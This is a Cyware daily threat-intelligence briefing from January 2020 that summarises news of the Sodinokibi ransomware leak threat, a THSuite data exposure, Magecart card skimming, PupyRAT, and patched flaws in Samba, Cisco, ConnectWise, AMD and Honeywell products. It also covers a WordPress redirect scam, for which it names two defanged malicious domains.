Cyware Daily Threat Intelligence, January 23, 2020

Share Blog post

The game of ‘naming and shaming’ victims continues! Now the operators of Sodinokibi ransomware have threatened to publish the stolen data of a German automotive supplier, GEDIA Automotive Group after the company did not respond to the ransom demand. The attackers have managed to steal more than 50GB including drawings, data of employees and customers.

In a widespread scam campaign, over 2000 WordPress sites have been hacked to redirect customers to scam sites that contain unwanted browser notification subscriptions, fake surveys, giveaways, and fake Adobe Flash downloads. Bad actors were successful in hacking the sites by exploiting the vulnerabilities in WordPress plugins and injecting malicious JavaScript in sites.    

The past 24 hours also saw a Magecart attack on sites belonging to a reseller of tickets for the Euro Cup and the Tokyo Summer Olympics. The purpose of the attack was to steal customers’ payment card details from the checkout pages of the sites. 

Top Breaches Reported in the Last 24 Hours

30,000 Cannabis users exposed
An unsecured Amazon S3 bucket belonging to THSuite had exposed over 85,000 files including more than 30,000 records with PII. The incident had affected three clients: Amedicanna Dispensary, Bloom Medicinals, and Colorado Grow Company. The exposed PII included names, home and email addresses, dates of birth, phone numbers, medical ID numbers, and much more.

Magecart attack
Sites belonging to a reseller of tickets for the Euro Cup and the Tokyo Summer Olympics have been infected with JavaScript that steals payment card details. The code was injected at the checkout page of websites. On one of the websites, the code had survived for at least 50 days.

Top Malware Reported in the Last 24 Hours

Sodinokibi ransomware threatens
Operators of Sodinokibi ransomware are now threatening to publish data stolen from GEDIA Automotive Group after they failed to comply with their ransom demand. Following the attack, the ransomware had encrypted all computers on the company's network.

PupyRAT
A hacking campaign that involves the use of PupyRAT is suspected to be used against the European energy sector to gather sensitive information. The malware can infiltrate Windows, Linux, OSX, and Android to give hackers access to the victim's system, including usernames, passwords, and sensitive information across the network.

Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable Apple Inc’s Safari
Google has uncovered multiple security flaws in Apple Inc’s Safari web browser that allowed the tracking of users’ browsing behavior. Apple has fixed the flaws since the disclosure.

Samba issues patches
Samba has released security updates for three flaws tracked as CVE-2019-14902, CVE-2019-14907, and CVE-2019-19344. The flaws can allow attackers to take control of systems.

Cisco patches Firepower Management Center
Cisco is urging its customers to update its Firepower Management Center software after it found a critical bug that attackers could exploit over the internet. The bug has a severity rating of 9.8 out of 10. The vulnerability is caused by a glitch in the way Cisco's software handles Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server.

Flawed MSPs
Eight vulnerabilities discovered in ConnectWise’s software for Managed Service Providers (MSPs) can allow attackers to silently execute code on any desktop managed by the application. One of these vulnerabilities has been identified as a Cross-Site Request Forgery (CSRF) flaw. It is believed that an attack chain for these vulnerabilities has similarities to the August attack on Texas local and state agencies.

Vulnerable AMD Radeon graphics cards patched
A total of four security vulnerabilities discovered in some AMD ATI Radeon graphics cards have been patched recently. Three of these flaws are out-of-bound flaws and the fourth one is type confusion issue. The three vulnerabilities are tracked as CVE-2019-5124, CVE-2019-5146, and CVE-2019-5147.

Honeywell’s MAXPRO flaws fixed
Some of Honeywell’s MAXPRO video surveillance systems are affected by serious vulnerabilities. These flaws can be exploited by hackers to take complete control of the system. The two flaws are CVE-20206959 and CVE-2020-6960. The vendor has released patches for the vulnerabilities in September 2019.

Top Scams Reported in the Last 24 Hours

Scam campaign
Over 2000 WordPress sites have been hacked to fuel a scam campaign to redirect visitors to scam sites containing unwanted browser notification subscriptions, fake surveys, giveaways, and fake Adobe Flash downloads. The hacking campaign involves attackers exploiting vulnerabilities in well-known WordPress plugins such as ‘CP Contact Form with PayPal’ and ‘Simple Fields’. When exploited, the vulnerabilities allow the attackers to inject malicious JavaScript downloaded from admarketlocation[.]com and gotosecond2[.]com.

 Tags

cisco firepower management center
sodinokibi ransomware
pupyrat
amd radeon

Posted on: January 23, 2020

Get the Daily Threat Briefing delivered to your email!


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.


Join Thousands of Other Cyware Followers!